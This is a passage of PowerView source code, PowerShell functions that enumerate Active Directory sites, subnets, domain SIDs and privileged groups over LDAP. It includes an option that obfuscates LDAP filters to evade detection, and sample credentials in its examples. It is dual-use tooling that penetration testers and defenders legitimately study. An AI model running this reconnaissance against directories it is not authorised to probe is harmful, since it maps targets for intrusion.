\"(gplink=*$GPLink*)\"\n            }\n\n            if ($PSBoundParameters['LDAPFilter']) {\n                Write-Verbose \"[Get-DomainSite] Using additional LDAP filter: $LDAPFilter\"\n                $Filter += \"$LDAPFilter\"\n            }\n\n            $SiteSearcher.filter = \"(&(objectCategory=site)$Filter)\"\n            Write-Verbose \"[Get-DomainSite] Get-DomainSite filter string: $($SiteSearcher.filter)\"\n\n            if ($PSBoundParameters['FindOne']) { $Results = $SiteSearcher.FindAll() }\n            else { $Results = $SiteSearcher.FindAll() }\n            $Results | Where-Object {$_} | ForEach-Object {\n                if ($PSBoundParameters['Raw']) {\n                    # return raw result objects\n                    $Site = $_\n                }\n                else {\n                    $Site = Convert-LDAPProperty -Properties $_.Properties\n                }\n                $Site.PSObject.TypeNames.Insert(0, 'PowerView.Site')\n                $Site\n            }\n            if ($Results) {\n                try { $Results.dispose() }\n                catch {\n                    Write-Verbose \"[Get-DomainSite] Error disposing of the Results object\"\n                }\n            }\n            $SiteSearcher.dispose()\n        }\n    }\n}\n\n\nfunction Get-DomainSubnet {\n<#\n.SYNOPSIS\n\nSearch for all subnets or specific subnets objects in AD.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty  \n\n.DESCRIPTION\n\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\nLDAP filter based on targeting/filter parameters, and searches for all objects\nmatching the criteria. To only return specific properties, use\n\"-Properties whencreated,usnchanged,...\". By default, all subnet objects for\nthe current domain are returned.\n\n.PARAMETER Identity\n\nAn subnet name (e.g. '192.168.50.0/24'), DistinguishedName (e.g. 'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'),\nor GUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted.\n\n.PARAMETER SiteName\n\nOnly return subnets from the specified SiteName.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Raw\n\nSwitch. Return raw results instead of translating the fields into a custom PSObject.\n\n.EXAMPLE\n\nGet-DomainSubnet\n\nReturns the current subnets in the domain.\n\n.EXAMPLE\n\nGet-DomainSubnet *admin* -Domain testlab.local\n\nReturns all subnets with \"admin\" in their name in the testlab.local domain.\n\n.EXAMPLE\n\nGet-DomainSubnet -GPLink \"F260B76D-55C8-46C5-BEF1-9016DD98E272\"\n\nReturns all subnets with linked to the specified group policy object.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainSubnet -Credential $Cred\n\n.OUTPUTS\n\nPowerView.Subnet\n\nCustom PSObject with translated subnet property fields.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.Subnet')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('Name')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $SiteName,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw\n    )\n\n    BEGIN {\n        $SearcherArguments = @{\n            'SearchBasePrefix' = 'CN=Subnets,CN=Sites,CN=Configuration'\n        }\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        $SubnetSearcher = Get-DomainSearcher @SearcherArguments\n    }\n\n    PROCESS {\n        if ($SubnetSearcher) {\n            $IdentityFilter = ''\n            $Filter = ''\n            $Identity | Where-Object {$_} | ForEach-Object {\n                $IdentityInstance = $_.Replace('(', '\\28').Replace(')', '\\29')\n                if ($IdentityInstance -match '^CN=.*') {\n                    $IdentityFilter += \"(distinguishedname=$IdentityInstance)\"\n                    if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {\n                        # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname\n                        #   and rebuild the domain searcher\n                        $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                        Write-Verbose \"[Get-DomainSubnet] Extracted domain '$IdentityDomain' from '$IdentityInstance'\"\n                        $SearcherArguments['Domain'] = $IdentityDomain\n                        $SubnetSearcher = Get-DomainSearcher @SearcherArguments\n                        if (-not $SubnetSearcher) {\n                            Write-Warning \"[Get-DomainSubnet] Unable to retrieve domain searcher for '$IdentityDomain'\"\n                        }\n                    }\n                }\n                else {\n                    try {\n                        $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\\$1'\n                        $IdentityFilter += \"(objectguid=$GuidByteString)\"\n                    }\n                    catch {\n                        $IdentityFilter += \"(name=$IdentityInstance)\"\n                    }\n                }\n            }\n            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n                $Filter += \"(|$IdentityFilter)\"\n            }\n\n            if ($PSBoundParameters['LDAPFilter']) {\n                Write-Verbose \"[Get-DomainSubnet] Using additional LDAP filter: $LDAPFilter\"\n                $Filter += \"$LDAPFilter\"\n            }\n\n            $SubnetSearcher.filter = \"(&(objectCategory=subnet)$Filter)\"\n            Write-Verbose \"[Get-DomainSubnet] Get-DomainSubnet filter string: $($SubnetSearcher.filter)\"\n\n            if ($PSBoundParameters['FindOne']) { $Results = $SubnetSearcher.FindOne() }\n            else { $Results = $SubnetSearcher.FindAll() }\n            $Results | Where-Object {$_} | ForEach-Object {\n                if ($PSBoundParameters['Raw']) {\n                    # return raw result objects\n                    $Subnet = $_\n                }\n                else {\n                    $Subnet = Convert-LDAPProperty -Properties $_.Properties\n                }\n                $Subnet.PSObject.TypeNames.Insert(0, 'PowerView.Subnet')\n\n                if ($PSBoundParameters['SiteName']) {\n                    # have to do the filtering after the LDAP query as LDAP doesn't let you specify\n                    #   wildcards for 'siteobject' :(\n                    if ($Subnet.properties -and ($Subnet.properties.siteobject -like \"*$SiteName*\")) {\n                        $Subnet\n                    }\n                    elseif ($Subnet.siteobject -like \"*$SiteName*\") {\n                        $Subnet\n                    }\n                }\n                else {\n                    $Subnet\n                }\n            }\n            if ($Results) {\n                try { $Results.dispose() }\n                catch {\n                    Write-Verbose \"[Get-DomainSubnet] Error disposing of the Results object: $_\"\n                }\n            }\n            $SubnetSearcher.dispose()\n        }\n    }\n}\n\n\nfunction Get-DomainSID {\n<#\n.SYNOPSIS\n\nReturns the SID for the current domain or the specified domain.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainComputer  \n\n.DESCRIPTION\n\nReturns the SID for the current domain or the specified domain by executing\nGet-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192)\nto search for domain controllers through LDAP. The SID of the returned domain controller\nis then extracted.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER SSL\n\nSwitch. Use SSL for the connection to the LDAP server.\n\n.PARAMETER Obfuscate\n\nSwitch. Obfuscate the resulting LDAP filter string using hex encoding.\n\n.EXAMPLE\n\nGet-DomainSID\n\n.EXAMPLE\n\nGet-DomainSID -Domain testlab.local\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainSID -Credential $Cred\n\n.OUTPUTS\n\nString\n\nA string representing the specified domain SID.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([String])]\n    [CmdletBinding()]\n    Param(\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $SSL,\n\n        [Switch]\n        $Obfuscate\n    )\n\n    $SearcherArguments = @{\n        'LDAPFilter' = '(userAccountControl:1.2.840.113556.1.4.803:=8192)'\n    }\n    if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n    if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n    if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n    if ($PSBoundParameters['SSL']) { $SearcherArguments['SSL'] = $SSL }\n    if ($PSBoundParameters['Obfuscate']) {$SearcherArguments['Obfuscate'] = $Obfuscate }\n\n    $DCSID = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1 -ExpandProperty objectsid\n\n    if ($DCSID) {\n        $DCSID.SubString(0, $DCSID.LastIndexOf('-'))\n    }\n    else {\n        Write-Verbose \"[Get-DomainSID] Error extracting domain SID for '$Domain'\"\n    }\n}\n\n\nfunction Get-DomainGroup {\n<#\n.SYNOPSIS\n\nReturn all groups or specific group objects in AD.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty  \n\n.DESCRIPTION\n\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\nLDAP filter based on targeting/filter parameters, and searches for all objects\nmatching the criteria. To only return specific properties, use\n\"-Properties samaccountname,usnchanged,...\". By default, all group objects for\nthe current domain are returned. To return the groups a specific user/group is\na part of, use -MemberIdentity X to execute token groups enumeration.\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)\nspecifying the group to query for. Wildcards accepted.\n\n.PARAMETER MemberIdentity\n\nA SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)\nspecifying the user/group member to query for group membership.\n\n.PARAMETER AdminCount\n\nSwitch. Return users with '(adminCount=1)' (meaning are/were privileged).\n\n.PARAMETER GroupScope\n\nSpecifies the scope (DomainLocal, Global, or Universal) of the group(s) to search for.\nAlso accepts NotDomainLocal, NotGloba, and NotUniversal as negations.\n\n.PARAMETER GroupProperty\n\nSpecifies a specific property to search for when performing the group search.\nPossible values are Security, Distribution, CreatedBySystem, and NotCreatedBySystem.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Raw\n\nSwitch. Return raw results instead of translating the fields into a custom PSObject.\n\n.PARAMETER SSL\n\nSwitch. Use SSL for the connection to the LDAP server.\n\n.PARAMETER Obfuscate\n\nSwitch. Obfuscate the resulting LDAP filter string using hex encoding.\n\n.EXAMPLE\n\nGet-DomainGroup | select samaccountname\n\nsamaccountname\n--------------\nWinRMRemoteWMIUsers__\nAdministrators\nUsers\nGuests\nPrint Operators\nBackup Operators\n...\n\n.EXAMPLE\n\nGet-DomainGroup *admin* | select distinguishedname\n\ndistinguishedname\n-----------------\nCN=Administrators,CN=Builtin,DC=testlab,DC=local\nCN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local\nCN=Schema Admins,CN=Users,DC=testlab,DC=local\nCN=Enterprise Admins,CN=Users,DC=testlab,DC=local\nCN=Domain Admins,CN=Users,DC=testlab,DC=local\nCN=DnsAdmins,CN=Users,DC=testlab,DC=local\nCN=Server Admins,CN=Users,DC=testlab,DC=local\nCN=Desktop Admins,CN=Users,DC=testlab,DC=local\n\n.EXAMPLE\n\nGet-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl\n\nsamaccountname\n--------------\nServer Admins\n\n.EXAMPLE\n\n'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose\nVERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local\nVERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local)))\n\nusncreated            : 13245\ngrouptype             : -2147483646\nsamaccounttype        : 268435456\nsamaccountname        : Desktop Admins\nwhenchanged           : 8/10/2016 12:30:30 AM\nobjectsid             : S-1-5-21-890171859-3433809279-3366196753-1118\nobjectclass           : {top, group}\ncn                    : Desktop Admins\nusnchanged            : 13255\ndscorepropagationdata : 1/1/1601 12:00:00 AM\nname                  : Desktop Admins\ndistinguishedname     : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\nmember                : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local\nwhencreated           : 8/10/2016 12:29:43 AM\ninstancetype          : 4\nobjectguid            : f37903ed-b333-49f4-abaa-46c65e9cca71\nobjectcategory        : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainGroup -Credential $Cred\n\n.EXAMPLE\n\nGet-Domain | Select-Object -Expand name\ntestlab.local\n\n'DEV\\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: [Get-DomainGroup] Extracted domain 'dev.testlab.local' from 'DEV\\Domain Admins'\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local\nVERBOSE: [Get-DomainGroup] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins)))\n\ndistinguishedname\n-----------------\nCN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local\n\n.OUTPUTS\n\nPowerView.Group\n\nCustom PSObject with translated group property fields.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [OutputType('PowerView.Group')]\n    [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('UserName')]\n        [String]\n        $MemberIdentity,\n\n        [Switch]\n        $AdminCount,\n\n        [ValidateSet('DomainLocal', 'NotDomainLocal', 'Global', 'NotGlobal', 'Universal', 'NotUniversal')]\n        [Alias('Scope')]\n        [String]\n        $GroupScope,\n\n        [ValidateSet('Security', 'Distribution', 'CreatedBySystem', 'NotCreatedBySystem')]\n        [String]\n        $GroupProperty,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Properties,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]\n        [String]\n        $SecurityMasks,\n\n        [Switch]\n        $Tombstone,\n\n        [Alias('ReturnOne')]\n        [Switch]\n        $FindOne,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $Raw,\n\n        [Switch]\n        $SSL,\n\n        [Switch]\n        $Obfuscate\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        if ($PSBoundParameters['SSL']) { $SearcherArguments['SSL'] = $SSL }\n        if ($PSBoundParameters['Obfuscate']) {$SearcherArguments['Obfuscate'] = $Obfuscate }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['MemberIdentity']) {\n\n            if ($SearcherArguments['Properties']) {\n                $OldProperties = $SearcherArguments['Properties']\n            }\n\n            $SearcherArguments['Identity'] = $MemberIdentity\n            $SearcherArguments['Raw'] = $True\n\n            Get-DomainObject @SearcherArguments | ForEach-Object {\n                # convert the user/group to a directory entry\n                $ObjectDirectoryEntry = $_.GetDirectoryEntry()\n\n                # cause the cache to calculate the token groups for the user/group\n                $ObjectDirectoryEntry.RefreshCache('tokenGroups')\n\n                $ObjectDirectoryEntry.TokenGroups | ForEach-Object {\n                    # convert the token group sid\n                    $GroupSid = (New-Object System.Security.Principal.SecurityIdentifier($_,0)).Value\n\n                    # ignore the built in groups\n                    if ($GroupSid -notmatch '^S-1-5-32-.*') {\n                        $SearcherArguments['Identity'] = $GroupSid\n                        $SearcherArguments['Raw'] = $False\n                        if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties }\n                        $Group = Get-DomainObject @SearcherArguments\n                        if ($Group) {\n                            $Group.PSObject.TypeNames.Insert(0, 'PowerView.Group')\n                            $Group\n                        }\n                    }\n                }\n            }\n        }\n        else {\n            $IdentityFilter = ''\n            $Filter = ''\n            $Identity | Where-Object {$_} | ForEach-Object {\n                $IdentityInstance = $_.Replace('(', '\\28').Replace(')', '\\29')\n                if ($IdentityInstance -match '^S-1-') {\n                    $IdentityFilter += \"(objectsid=$IdentityInstance)\"\n                }\n                elseif ($IdentityInstance -match '^CN=') {\n                    $IdentityFilter += \"(distinguishedname=$IdentityInstance)\"\n                    if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {\n                        # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname\n                        #   and rebuild the domain searcher\n                        $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                        Write-Verbose \"[Get-DomainGroup] Extracted domain '$IdentityDomain' from '$IdentityInstance'\"\n                        $SearcherArguments['Domain'] = $IdentityDomain\n                        $GroupSearcher = Get-DomainSearcher @SearcherArguments\n                        if (-not $GroupSearcher) {\n                            Write-Warning \"[Get-DomainGroup] Unable to retrieve domain searcher for '$IdentityDomain'\"\n                        }\n                    }\n                }\n                elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {\n                    $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\\' + $_.ToString('X2') }) -join ''\n                    $IdentityFilter += \"(objectguid=$GuidByteString)\"\n                }\n                elseif ($IdentityInstance.Contains('\\')) {\n                    $ConvertedIdentityInstance = $IdentityInstance.Replace('\\28', '(').Replace('\\29', ')') | Convert-ADName -OutputType Canonical\n                    if ($ConvertedIdentityInstance) {\n                        $GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))\n                        $GroupName = $IdentityInstance.Split('\\')[1]\n                        $IdentityFilter += \"(samAccountName=$GroupName)\"\n                        $SearcherArguments['Domain'] = $GroupDomain\n                        Write-Verbose \"[Get-DomainGroup] Extracted domain '$GroupDomain' from '$IdentityInstance'\"\n                        $GroupSearcher = Get-DomainSearcher @SearcherArguments\n                    }\n                }\n                else {\n                    $IdentityFilter += \"(|(samAccountName=$IdentityInstance)(name=$IdentityInstance))\"\n                }\n            }\n\n            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n                $Filter += \"(|$IdentityFilter)\"\n            }\n\n            if ($PSBoundParameters['AdminCount']) {\n                Write-Verbose '[Get-DomainGroup] Searching for adminCount=1'\n                $Filter += '(admincount=1)'\n            }\n            if ($PSBoundParameters['GroupScope']) {\n                $GroupScopeValue = $PSBoundParameters['GroupScope']\n                $Filter = Switch ($GroupScopeValue) {\n                    'DomainLocal'       { '(groupType:1.2.840.113556.1.4.803:=4)' }\n                    'NotDomainLocal'    { '(!(groupType:1.2.840.113556.1.4.803:=4))' }\n                    'Global'            { '(groupType:1.2.840.113556.1.4.803:=2)' }\n                    'NotGlobal'         { '(!(groupType:1.2.840.113556.1.4.803:=2))' }\n                    'Universal'         { '(groupType:1.2.840.113556.1.4.803:=8)' }\n                    'NotUniversal'      { '(!(groupType:1.2.840.113556.1.4.803:=8))' }\n                }\n                Write-Verbose \"[Get-DomainGroup] Searching for group scope '$GroupScopeValue'\"\n            }\n            if ($PSBoundParameters['GroupProperty']) {\n                $GroupPropertyValue = $PSBoundParameters['GroupProperty']\n                $Filter = Switch ($GroupPropertyValue) {\n                    'Security'              { '(groupType:1.2.840.113556.1.4.803:=2147483648)' }\n                    'Distribution'          { '(!(groupType:1.2.840.113556.1.4.803:=2147483648))' }\n                    'CreatedBySystem'       { '(groupType:1.2.840.113556.1.4.803:=1)' }\n                    'NotCreatedBySystem'    { '(!(groupType:1.2.840.113556.1.4.803:=1))' }\n                }\n                Write-Verbose \"[Get-DomainGroup] Searching for group property '$GroupPropertyValue'\"\n            }\n            if ($PSBoundParameters['LDAPFilter']) {\n                Write-Verbose \"[Get-DomainGroup] Using additional LDAP filter: $LDAPFilter\"\n                $Filter += \"$LDAPFilter\"\n            }\n\n            $Filter = \"(&(objectCategory=group)$Filter)\"\n            Write-Verbose \"[Get-DomainGroup] filter string: $($Filter)\"\n            $Results = Invoke-LDAPQuery @SearcherArguments -LDAPFilter \"$Filter\"\n            $Results | Where-Object {$_} | ForEach-Object {\n                if ($PSBoundParameters['Raw']) {\n                    # return raw result objects\n                    $Group = $_\n                }\n                else {\n                    if (Get-Member -inputobject $_ -name \"Attributes\" -Membertype Properties) {\n                        $Prop = @{}\n                        foreach ($a in $_.Attributes.Keys | Sort-Object) {\n                            if (($a -eq 'objectsid') -or ($a -eq 'sidhistory') -or ($a -eq 'objectguid') -or ($a -eq 'usercertificate')) {\n                                $Prop[$a] = $_.Attributes[$a]\n                            }\n                            else {\n                                $Values = @()\n                                foreach ($v in $_.Attributes[$a].GetValues([byte[]])) {\n                                    $Values += [System.Text.Encoding]::UTF8.GetString($v)\n                                }\n                                $Prop[$a] = $Values\n                            }\n                        }\n                    }\n                    else {\n                        $Prop = $_.Properties\n                    }\n\n                    $Group = Convert-LDAPProperty -Properties $Prop\n                }\n                $Group.PSObject.TypeNames.Insert(0, 'PowerView.Group')\n                $Group\n            }\n            if ($Results) {\n                try { $Results.dispose() }\n                catch {\n                    Write-Verbose \"[Get-DomainGroup] Error disposing of the Results object\"\n                }\n            }\n        }\n    }\n}\n\n\nfunction New-DomainGroup {\n<#\n.SYNOPSIS\n\nCreates a new domain group (assuming appropriate permissions) and returns the group object.\n\nTODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-PrincipalContext  \n\n.DESCRIPTION\n\nFirst binds to the specified domain context using Get-PrincipalContext.\nThe bound domain context is then used to create a new\nDirectoryServices.AccountManagement.GroupPrincipal with the specified\ngroup properties.\n\n.PARAMETER SamAccountName\n\nSpecifies the Security Account Manager (SAM) account name of the group to create.\nMaximum of 256 characters. Mandatory.\n\n.PARAMETER Name\n\nSpecifies the name of the group to create. If not provided, defaults to SamAccountName.\n\n.PARAMETER DisplayName\n\nSpecifies the display name of the group to create. If not provided, defaults to SamAccountName.\n\n.PARAMETER Description\n\nSpecifies the description of the group to create.\n\n.PARAMETER Domain\n\nSpecifies the domain to use to search for user/group principals, defaults to the current domain.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nNew-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.'\n\nCreates the 'TestGroup' group with the specified description.\n\n.EXAMPLE\n\n$SecPassword = 